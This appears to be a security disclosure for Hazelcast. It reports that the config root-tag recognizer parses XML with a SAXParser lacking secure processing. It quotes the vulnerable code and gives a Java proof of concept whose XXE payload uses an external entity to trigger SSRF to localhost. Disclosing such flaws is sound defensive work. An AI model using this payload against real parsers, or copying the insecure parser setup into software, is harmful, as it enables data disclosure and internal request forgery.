The AbstractXmlConfigRootTagRecognizer() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65
public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
this.expectedRootNode = expectedRootNode;
SAXParserFactory factory = SAXParserFactory.newInstance();
saxParser = factory.newSAXParser();
}
@Override
public boolean isRecognized(ConfigStream configStream) throws Exception {
MemberHandler memberHandler = new MemberHandler(expectedRootNode);
try {
saxParser.parse(configStream, memberHandler);
}
Extracted out the key function mentioned above to showcase how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;
public class Poc {
public static void main(String[] args) {
try {
String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
} catch (Exception e) {
e.printStackTrace();
}
}
}
Causes an SSRF to http://127.0.0.1
This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.